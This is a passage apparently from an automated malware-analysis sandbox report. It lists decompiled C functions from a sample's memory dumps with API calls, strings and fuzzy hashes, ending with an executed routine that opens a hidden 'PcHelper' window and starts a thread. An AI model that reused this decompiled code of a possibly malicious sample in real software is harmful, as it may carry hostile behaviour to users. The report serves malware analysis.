    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$Attributes$H_prologTime
    • String ID: :
    • API String ID: 1861295151-336475711
    • Opcode ID: a0a63e7d6fe7d0470297f80b431f96e2621cf504add82e6ec098422f2e14673a
    • Instruction ID: 3252ee16d05227a0eedae38861725bde85b2d6e7e842f504d20aaa3988cbbe34
    • Opcode Fuzzy Hash: a0a63e7d6fe7d0470297f80b431f96e2621cf504add82e6ec098422f2e14673a
    • Instruction Fuzzy Hash: 7E417F71805118AADB24EB58CC55EEE777CFF85300F0040E5B646E2182DB749F88CBE2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0083B3C9(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v4096;
    				short _v4100;
    				signed short* _t30;
    				long _t32;
    				short _t33;
    				void* _t39;
    				signed short* _t52;
    				void* _t53;
    				signed short* _t62;
    				void* _t66;
    				intOrPtr _t69;
    				signed short* _t71;
    				intOrPtr _t73;
    
    				E0084D9C0();
    				_t71 = _a4;
    				if( *_t71 != 0) {
    					E0083B563(_t71);
    					_t66 = E00852B93(_t71);
    					_t30 = E0083B58F(_t71);
    					__eflags = _t30;
    					if(_t30 == 0) {
    						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
    						__eflags = _t32;
    						if(_t32 == 0) {
    							L22:
    							_t33 = 0;
    							__eflags = 0;
    							L23:
    							goto L24;
    						}
    						__eflags = _t32 - 0x7ff;
    						if(_t32 > 0x7ff) {
    							goto L22;
    						}
    						__eflags = E0083B66A( *_t71 & 0x0000ffff);
    						if(__eflags == 0) {
    							E0083AF49(__eflags,  &_v4100, 0x800);
    							_t39 = E00852B93( &_v4100);
    							_t69 = _a12;
    							__eflags = _t69 - _t39 + _t66 + 4;
    							if(_t69 <= _t39 + _t66 + 4) {
    								goto L22;
    							}
    							E0083FAE7(_a8, L"\\\\?\\", _t69);
    							E0083FABF(__eflags, _a8,  &_v4100, _t69);
    							__eflags =  *_t71 - 0x2e;
    							if(__eflags == 0) {
    								__eflags = E0083B66A(_t71[1] & 0x0000ffff);
    								if(__eflags != 0) {
    									_t71 =  &(_t71[2]);
    									__eflags = _t71;
    								}
    							}
    							L19:
    							_push(_t69);
    							L20:
    							_push(_t71);
    							L21:
    							_push(_a8);
    							E0083FABF(__eflags);
    							_t33 = 1;
    							goto L23;
    						}
    						_t13 = _t66 + 6; // 0x6
    						_t69 = _a12;
    						__eflags = _t69 - _t13;
    						if(_t69 <= _t13) {
    							goto L22;
    						}
    						E0083FAE7(_a8, L"\\\\?\\", _t69);
    						_v4096 = 0;
    						E0083FABF(__eflags, _a8,  &_v4100, _t69);
    						goto L19;
    					}
    					_t52 = E0083B563(_t71);
    					__eflags = _t52;
    					if(_t52 == 0) {
    						_t53 = 0x5c;
    						__eflags =  *_t71 - _t53;
    						if( *_t71 != _t53) {
    							goto L22;
    						}
    						_t62 =  &(_t71[1]);
    						__eflags =  *_t62 - _t53;
    						if( *_t62 != _t53) {
    							goto L22;
    						}
    						_t73 = _a12;
    						_t9 = _t66 + 6; // 0x6
    						__eflags = _t73 - _t9;
    						if(_t73 <= _t9) {
    							goto L22;
    						}
    						E0083FAE7(_a8, L"\\\\?\\", _t73);
    						E0083FABF(__eflags, _a8, L"UNC", _t73);
    						_push(_t73);
    						_push(_t62);
    						goto L21;
    					}
    					_t2 = _t66 + 4; // 0x4
    					__eflags = _a12 - _t2;
    					if(_a12 <= _t2) {
    						goto L22;
    					}
    					E0083FAE7(_a8, L"\\\\?\\", _a12);
    					_push(_a12);
    					goto L20;
    				} else {
    					_t33 = 0;
    					L24:
    					return _t33;
    				}
    			}
















    0x0083b3d1
    0x0083b3d7
    0x0083b3de
    0x0083b3ea
    0x0083b3f7
    0x0083b3f9
    0x0083b3fe
    0x0083b400
    0x0083b486
    0x0083b48c
    0x0083b48e
    0x0083b54d
    0x0083b54d
    0x0083b54d
    0x0083b54f
    0x00000000
    0x0083b550
    0x0083b494
    0x0083b496
    0x00000000
    0x00000000
    0x0083b4a5
    0x0083b4a7
    0x0083b4ec
    0x0083b4f8
    0x0083b502
    0x0083b506
    0x0083b508
    0x00000000
    0x00000000
    0x0083b513
    0x0083b523
    0x0083b528
    0x0083b52c
    0x0083b538
    0x0083b53a
    0x0083b53c
    0x0083b53c
    0x0083b53c
    0x0083b53a
    0x0083b53f
    0x0083b53f
    0x0083b540
    0x0083b540
    0x0083b541
    0x0083b541
    0x0083b544
    0x0083b549
    0x00000000
    0x0083b549
    0x0083b4a9
    0x0083b4ac
    0x0083b4af
    0x0083b4b1
    0x00000000
    0x00000000
    0x0083b4c0
    0x0083b4c7
    0x0083b4d9
    0x00000000
    0x0083b4d9
    0x0083b403
    0x0083b408
    0x0083b40a
    0x0083b432
    0x0083b433
    0x0083b436
    0x00000000
    0x00000000
    0x0083b43c
    0x0083b43f
    0x0083b442
    0x00000000
    0x00000000
    0x0083b448
    0x0083b44b
    0x0083b44e
    0x0083b450
    0x00000000
    0x00000000
    0x0083b45f
    0x0083b46d
    0x0083b472
    0x0083b473
    0x00000000
    0x0083b473
    0x0083b40c
    0x0083b40f
    0x0083b412
    0x00000000
    0x00000000
    0x0083b423
    0x0083b428
    0x00000000
    0x0083b3e0
    0x0083b3e0
    0x0083b551
    0x0083b555
    0x0083b555

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: UNC$\\?\
    • API String ID: 0-253988292
    • Opcode ID: 873d0e1e2c519b9dd7648b02a60321b3729f2ae2c4b451562a9e64c097a6a56b
    • Instruction ID: 2f5254512beecc4203f81bdf092bf90da5a75b34e8ee07dd3a0d7d6b5f18f0df
    • Opcode Fuzzy Hash: 873d0e1e2c519b9dd7648b02a60321b3729f2ae2c4b451562a9e64c097a6a56b
    • Instruction Fuzzy Hash: 4641C5B1500259B6CF21AF64DC42EEE7769FF81360F144066FA58E3141E774DE90CAD1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00848A72(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
    				void* __esi;
    				intOrPtr _t18;
    				char _t19;
    				intOrPtr* _t23;
    				signed int _t25;
    				void* _t26;
    				intOrPtr* _t28;
    				void* _t38;
    				void* _t43;
    				intOrPtr _t44;
    				signed int* _t48;
    
    				_t44 = _a4;
    				_t43 = __ecx;
    				 *((intOrPtr*)(__ecx + 4)) = _t44;
    				_t18 = E0084D880(__edx, _t44, __eflags, 0x30);
    				_a4 = _t18;
    				if(_t18 == 0) {
    					_t19 = 0;
    					__eflags = 0;
    				} else {
    					_t19 = E00848428(_t18);
    				}
    				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
    				if(_t19 == 0) {
    					return _t19;
    				} else {
    					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
    					E008491F7( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
    					E00849390( *((intOrPtr*)(_t43 + 0xc)), 1);
    					E00849346( *((intOrPtr*)(_t43 + 0xc)), 1);
    					_t23 = E008492AB( *((intOrPtr*)(_t43 + 0xc)));
    					_t28 = _t23;
    					if(_t28 == 0) {
    						L7:
    						__eflags =  *(_t43 + 0x10);
    						if( *(_t43 + 0x10) != 0) {
    							E008485F4(_t43);
    							_t25 =  *(_t43 + 0x10);
    							_push(0);
    							_push(0);
    							_push(0);
    							 *((char*)(_t43 + 0x25)) = 0;
    							_t38 =  *_t25;
    							_push(0);
    							__eflags =  *(_t43 + 0x20);
    							if( *(_t43 + 0x20) == 0) {
    								_push(L"about:blank");
    							} else {
    								_push( *(_t43 + 0x20));
    							}
    							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
    						}
    						L12:
    						return _t23;
    					}
    					_t10 = _t43 + 0x10; // 0x10
    					_t48 = _t10;
    					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x86412c, _t48);
    					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
    					if(_t26 >= 0) {
    						goto L7;
    					}
    					 *_t48 =  *_t48 & 0x00000000;
    					goto L12;
    				}
    			}














    0x00848a73
    0x00848a78
    0x00848a7c
    0x00848a7f
    0x00848a84
    0x00848a8b
    0x00848a96
    0x00848a96
    0x00848a8d
    0x00848a8f
    0x00848a8f
    0x00848a98
    0x00848a9d
    0x00848b28
    0x00848aa3
    0x00848aa5
    0x00848ab0
    0x00848aba
    0x00848ac4
    0x00848acc
    0x00848ad1
    0x00848ad5
    0x00848af7
    0x00848af9
    0x00848afc
    0x00848b00
    0x00848b05
    0x00848b08
    0x00848b09
    0x00848b0a
    0x00848b0b
    0x00848b0e
    0x00848b10
    0x00848b11
    0x00848b14
    0x00848b1b
    0x00848b16
    0x00848b16
    0x00848b16
    0x00848b21
    0x00848b21
    0x00848b24
    0x00000000
    0x00848b25
    0x00848ad9
    0x00848ad9
    0x00848ae3
    0x00848aea
    0x00848aef
    0x00000000
    0x00000000
    0x00848af1
    0x00000000
    0x00848af1

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: Shell.Explorer$about:blank
    • API String ID: 0-874089819
    • Opcode ID: 6d01630c75c859344a8540ba6fdf2aa08eb3208ae71fb649876f64aaff4d4d9d
    • Instruction ID: 46824d92d758f301eb73ce446221756000c7a1cc89b13f3f25c0d29aa985e253
    • Opcode Fuzzy Hash: 6d01630c75c859344a8540ba6fdf2aa08eb3208ae71fb649876f64aaff4d4d9d
    • Instruction Fuzzy Hash: 76214D7170065EEFD714DF68C895E2AB7A8FF45324B04462AF215CB681DFB4E850CB92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E0083E898(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
    				void* __esi;
    				void* __ebp;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				signed char _t13;
    				void* _t17;
    				signed char _t18;
    				void* _t20;
    				signed int _t22;
    				signed int _t30;
    				void* _t31;
    				void* _t32;
    				intOrPtr _t33;
    				signed int _t36;
    
    				_t32 = __edi;
    				_t17 = __ebx;
    				_t11 =  *0x877358; // 0x0
    				if(_t11 == 0) {
    					E0083E819(0x877350);
    					_t11 =  *0x877358; // 0x0
    				}
    				_t36 = _a8;
    				_t22 = _t36 & 0xfffffff0;
    				_t30 = 0 | _a16 != 0x00000000;
    				if(_a12 == 0) {
    					_t12 =  *0x87735c; // 0x0
    					if(_t12 == 0) {
    						goto L10;
    					} else {
    						_t13 =  *_t12(_a4, _t22, _t30);
    						if(_t13 == 0) {
    							_push(L"CryptUnprotectMemory failed");
    							goto L6;
    						}
    					}
    				} else {
    					if(_t11 == 0) {
    						L10:
    						_push(_t17);
    						_t13 = GetCurrentProcessId();
    						_t31 = 0;
    						_t18 = _t13;
    						if(_t36 != 0) {
    							_push(_t32);
    							_t33 = _a4;
    							_t20 = _t18 + 0x4b;
    							do {
    								_t13 = _t31 + _t20;
    								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
    								_t31 = _t31 + 1;
    							} while (_t31 < _t36);
    						}
    					} else {
    						_t13 =  *_t11(_a4, _t22, _t30);
    						if(_t13 == 0) {
    							_push(L"CryptProtectMemory failed");
    							L6:
    							_push(0x8700e0);
    							_t13 = E00836DE3(E0084E76A(E00836DE8(_t22)), 0x8700e0, 0x8700e0, 2);
    						}
    					}
    				}
    				return _t13;
    			}

















    0x0083e898
    0x0083e898
    0x0083e89b
    0x0083e8a2
    0x0083e8a9
    0x0083e8ae
    0x0083e8ae
    0x0083e8b4
    0x0083e8bb
    0x0083e8c1
    0x0083e8c8
    0x0083e8fd
    0x0083e904
    0x00000000
    0x0083e906
    0x0083e90b
    0x0083e90f
    0x0083e911
    0x00000000
    0x0083e911
    0x0083e90f
    0x0083e8ca
    0x0083e8cc
    0x0083e918
    0x0083e918
    0x0083e919
    0x0083e91f
    0x0083e921
    0x0083e925
    0x0083e927
    0x0083e928
    0x0083e92b
    0x0083e92e
    0x0083e931
    0x0083e934
    0x0083e936
    0x0083e937
    0x0083e93b
    0x0083e8ce
    0x0083e8d3
    0x0083e8d7
    0x0083e8d9
    0x0083e8de
    0x0083e8e3
    0x0083e8f6
    0x0083e8f6
    0x0083e8d7
    0x0083e8cc
    0x0083e93f

    APIs
      • Part of subcall function 0083E819: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083E838
      • Part of subcall function 0083E819: GetProcAddress.KERNEL32(00877350,CryptUnprotectMemory), ref: 0083E848
    • GetCurrentProcessId.KERNEL32(?,?,?,0083E892), ref: 0083E919
    Strings
    • CryptUnprotectMemory failed, xrefs: 0083E911
    • CryptProtectMemory failed, xrefs: 0083E8D9
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    • Opcode ID: 9675b01d8c240ef419997f5374358c23c0379a001e5d096cd6b8dbbe909f8baf
    • Instruction ID: 85a4d0320fb3fb85648bb113d24f36b65c90c124e936cc5917b00f9a2c42888e
    • Opcode Fuzzy Hash: 9675b01d8c240ef419997f5374358c23c0379a001e5d096cd6b8dbbe909f8baf
    • Instruction Fuzzy Hash: 84112730B046456BEB159B39DC41BAA3B89FFC4B14F088069F805DA2D2EB64DD41D3E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0083CDCF(void* __ebx, void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				char _v1028;
    				void* _t9;
    				void* _t12;
    				intOrPtr _t14;
    				intOrPtr _t16;
    				void* _t24;
    				intOrPtr* _t27;
    
    				_t19 = __ecx;
    				_t9 = E0083CE49(__ebx, __ecx, __eflags, _a4, L"SIZE",  &_v1028, 0x200);
    				if(_t9 == 0) {
    					return _t9;
    				}
    				_push(0x2a);
    				_push( &_v1028);
    				_t24 = E00850BB8(_t19);
    				if(_t24 == 0) {
    					_t12 = 0;
    					__eflags = 0;
    				} else {
    					_push( &_v1028);
    					_t14 = E00841424();
    					_t27 = _a8;
    					 *_t27 = _t14;
    					_t6 = _t24 + 2; // 0x2
    					_t16 = E00841424();
    					 *_a12 = _t16;
    					if( *_t27 != 0x64 || _t16 != 0x64) {
    						_t12 = 1;
    					} else {
    						_t12 = 0;
    					}
    				}
    				return _t12;
    			}










    0x0083cdcf
    0x0083cdec
    0x0083cdf3
    0x0083ce46
    0x0083ce46
    0x0083cdfc
    0x0083cdfe
    0x0083ce04
    0x0083ce0a
    0x0083ce40
    0x0083ce40
    0x0083ce0c
    0x0083ce13
    0x0083ce14
    0x0083ce19
    0x0083ce1c
    0x0083ce1e
    0x0083ce22
    0x0083ce2a
    0x0083ce30
    0x0083ce3d
    0x0083ce37
    0x0083ce37
    0x0083ce37
    0x0083ce30
    0x00000000

    APIs
      • Part of subcall function 0083CE49: _swprintf.LIBCMT ref: 0083CE69
    • _wcschr.LIBVCRUNTIME ref: 0083CDFF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _swprintf_wcschr
    • String ID: 0Z$SIZE
    • API String ID: 577678113-4168964419
    • Opcode ID: 86a044295046cbe97eeb09185dc9e3967d420855760e34305c825593dd361116
    • Instruction ID: 044e994dd820ba1fa976494c3893b5c79d00ccadd0860756addabf19b4a09caf
    • Opcode Fuzzy Hash: 86a044295046cbe97eeb09185dc9e3967d420855760e34305c825593dd361116
    • Instruction Fuzzy Hash: 850186B650030D6BCF31EA68DC06EEA73ACFB95314F1404A9EA52F7241EA30E985C7D5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0085A82C(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				signed int _t15;
    				intOrPtr _t20;
    				void* _t24;
    				signed int _t25;
    				void* _t29;
    				intOrPtr _t30;
    				void* _t31;
    				void* _t36;
    
    				_t28 = __edx;
    				_t24 = __ecx;
    				_t23 = __ebx;
    				E0084E2F0(__edx, 0x86a9f0, 0xc);
    				_t30 = 0;
    				 *((intOrPtr*)(_t31 - 0x1c)) = 0;
    				_t29 = E00858571(__ebx, _t24, __edx);
    				_t25 =  *0x86dda0; // 0xfffffffe
    				if(( *(_t29 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t29 + 0x4c)) == 0) {
    					L5:
    					_t15 = E0085998C(5);
    					 *((intOrPtr*)(_t31 - 4)) = _t30;
    					_t30 =  *((intOrPtr*)(_t29 + 0x48));
    					 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
    					_t36 = _t30 -  *0x86dd40; // 0x5b22e8
    					if(_t36 != 0) {
    						if(_t30 != 0) {
    							asm("lock xadd [esi], eax");
    							if((_t15 | 0xffffffff) == 0 && _t30 != 0x86db20) {
    								E00857AC6(_t30);
    							}
    						}
    						_t20 =  *0x86dd40; // 0x5b22e8
    						 *((intOrPtr*)(_t29 + 0x48)) = _t20;
    						_t30 =  *0x86dd40; // 0x5b22e8
    						 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
    						asm("lock inc dword [esi]");
    					}
    					 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
    					E0085A8BD();
    					goto L3;
    				} else {
    					_t30 =  *((intOrPtr*)(_t29 + 0x48));
    					L3:
    					if(_t30 != 0) {
    						return E0084E336(_t28);
    					}
    					E00857B4E(_t23, _t28, _t29, _t30);
    					goto L5;
    				}
    			}











    0x0085a82c
    0x0085a82c
    0x0085a82c
    0x0085a833
    0x0085a838
    0x0085a83a
    0x0085a842
    0x0085a844
    0x0085a850
    0x0085a863
    0x0085a865
    0x0085a86b
    0x0085a86e
    0x0085a871
    0x0085a874
    0x0085a87a
    0x0085a87e
    0x0085a883
    0x0085a887
    0x0085a892
    0x0085a897
    0x0085a887
    0x0085a898
    0x0085a89d
    0x0085a8a0
    0x0085a8a6
    0x0085a8a9
    0x0085a8a9
    0x0085a8ac
    0x0085a8b3
    0x00000000
    0x0085a857
    0x0085a857
    0x0085a85a
    0x0085a85c
    0x0085a8cd
    0x0085a8cd
    0x0085a85e
    0x00000000
    0x0085a85e

    APIs
      • Part of subcall function 00858571: GetLastError.KERNEL32(?,008700E0,008533F4,008700E0,?,?,00852E6F,?,?,008700E0), ref: 00858575
      • Part of subcall function 00858571: _free.LIBCMT ref: 008585A8
      • Part of subcall function 00858571: SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585E9
      • Part of subcall function 00858571: _abort.LIBCMT ref: 008585EF
    • _abort.LIBCMT ref: 0085A85E
    • _free.LIBCMT ref: 0085A892
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_abort_free
    • String ID: "[
    • API String ID: 289325740-3208272576
    • Opcode ID: 327a034f19cad51916ac2ccbf245e83e46472bb196a882c807589d4626833ca1
    • Instruction ID: 958f039090b9bd630c22c51094d44f3f389fd870ec55dc842716bfbd36589e1a
    • Opcode Fuzzy Hash: 327a034f19cad51916ac2ccbf245e83e46472bb196a882c807589d4626833ca1
    • Instruction Fuzzy Hash: 18018031D01735AFC72AAF5D988162DB760FB44B22B16432AEC24E7681C77469468FC3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E008404D4(void* __ecx, void* __ebp, void* _a4) {
    				void* __esi;
    				long _t2;
    				void* _t6;
    
    				_t6 = __ecx;
    				_t2 = WaitForSingleObject(_a4, 0xffffffff);
    				if(_t2 == 0xffffffff) {
    					_push(GetLastError());
    					return E00836DE3(E00836DE8(_t6, 0x8700e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x8700e0, 0x8700e0, 2);
    				}
    				return _t2;
    			}






    0x008404d4
    0x008404da
    0x008404e3
    0x008404ec
    0x00000000
    0x0084050b
    0x0084050c

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,008405F3,?,?,00840668,?,?,?,?,?,00840652), ref: 008404DA
    • GetLastError.KERNEL32(?,?,00840668,?,?,?,?,?,00840652), ref: 008404E6
      • Part of subcall function 00836DE8: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836E06
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 008404EF
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 87164338271b7aa0fa0e0ce9190ec10f37ca330fbd5f6ada41df018c6be97001
    • Instruction ID: 7d23d36af82340926f36c12ad87f4a666b408f1c1a8c534d82003fc04fc9c2c0
    • Opcode Fuzzy Hash: 87164338271b7aa0fa0e0ce9190ec10f37ca330fbd5f6ada41df018c6be97001
    • Instruction Fuzzy Hash: CED02E31A0AC2073CA00332C6C0AEAF3925FF42330F228348F238E42F5DA6049908AD3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083D70A(void* __ecx) {
    				struct HRSRC__* _t3;
    				void* _t5;
    
    				_t5 = __ecx;
    				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
    				if(_t3 != 0) {
    					 *((char*)(_t5 + 0x64)) = 1;
    					return _t3;
    				}
    				return _t3;
    			}





    0x0083d70d
    0x0083d71d
    0x0083d725
    0x0083d727
    0x00000000
    0x0083d727
    0x0083d72c

    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,0083D007,?), ref: 0083D70F
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0083D007,?), ref: 0083D71D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: 8bfc5cde6908912c4590565ed91ce5b9b1c4d096caa55fe7755bf2d9390eed0e
    • Instruction ID: ea317494d782435fbaf9258f482baca9c6c74cfdc4916a9231c13e0096d9cfd4
    • Opcode Fuzzy Hash: 8bfc5cde6908912c4590565ed91ce5b9b1c4d096caa55fe7755bf2d9390eed0e
    • Instruction Fuzzy Hash: BBC01231245F5166DF3027207C0DF432D88BB01B51F061488F243DD1D0D5E9C441C791
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 100%
    			E010710A0(void* __ebx, struct HINSTANCE__* _a4) {
    				signed int _v8;
    				struct _WNDCLASSEXW _v56;
    				void* _v76;
    				struct tagMSG _v84;
    				struct HACCEL__* _v88;
    				void* __edi;
    				void* __esi;
    				signed int _t28;
    				struct HICON__* _t32;
    				struct HICON__* _t34;
    				struct HWND__* _t37;
    				struct HACCEL__* _t40;
    				void* _t62;
    				struct HINSTANCE__* _t63;
    				struct HWND__* _t66;
    				void* _t67;
    				signed int _t68;
    
    				_t28 =  *0x108300c; // 0x98fa3f37
    				_v8 = _t28 ^ _t68;
    				_t63 = _a4;
    				LoadStringW(_t63, 0x67, "PcHelper", 0x64); // executed
    				LoadStringW(_t63, 0x6d, "PCHELPER", 0x64);
    				_v56.cbSize = 0x30;
    				_v56.style = 3;
    				_v56.lpfnWndProc = E01071230;
    				_v56.cbClsExtra = 0;
    				_v56.cbWndExtra = 0;
    				_v56.hInstance = _t63;
    				_t32 = LoadIconW(_t63, 0x6b); // executed
    				_v56.hIcon = _t32;
    				_v56.hCursor = LoadCursorW(0, 0x7f00);
    				_v56.hbrBackground = 6;
    				_v56.lpszMenuName = 0x6d;
    				_v56.lpszClassName = 0x1084420;
    				_t34 = LoadIconW(_v56.hInstance, 0x6c); // executed
    				_v56.hIconSm = _t34;
    				RegisterClassExW( &_v56);
    				 *0x10845b0 = _t63; // executed
    				_t37 = CreateWindowExW(0, "PCHELPER", "PcHelper", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, _t63, 0); // executed
    				_t66 = _t37;
    				if(_t66 != 0) {
    					ShowWindow(_t66, 0); // executed
    					UpdateWindow(_t66);
    					_t40 = LoadAcceleratorsW(_t63, 0x6d); // executed
    					_v88 = _t40;
    					CreateThread(0, 0, E01071020, 0, 0, 0); // executed
    					_t67 = GetMessageW;
    					if(GetMessageW( &_v84, 0, 0, 0) != 0) {
    						_t63 = TranslateMessage;
    						do {
    							if(TranslateAcceleratorW(_v84, _v88,  &_v84) == 0) {
    								TranslateMessage( &_v84);
    								DispatchMessageW( &_v84);
    							}
    						} while (GetMessageW( &_v84, 0, 0, 0) != 0);
    					}
    					return E01071463(_v8 ^ _t68, _t62, _t63, _t67);
    				} else {
    					return E01071463(_v8 ^ _t68, _t62, _t63, _t66);
    				}
    			}




















    0x010710a6
    0x010710ad
    0x010710b8
    0x010710c5
    0x010710d1
    0x010710dc
    0x010710e3
    0x010710ea
    0x010710f1
    0x010710f8
    0x010710ff
    0x01071102
    0x0107110b
    0x01071119
    0x0107111c
    0x01071123
    0x0107112a
    0x01071131
    0x01071133
    0x0107113a
    0x01071166
    0x0107116c
    0x01071172
    0x01071176
    0x0107118d
    0x01071194
    0x0107119d
    0x010711b2
    0x010711b5
    0x010711bb
    0x010711cf
    0x010711d1
    0x010711e0
    0x010711f2
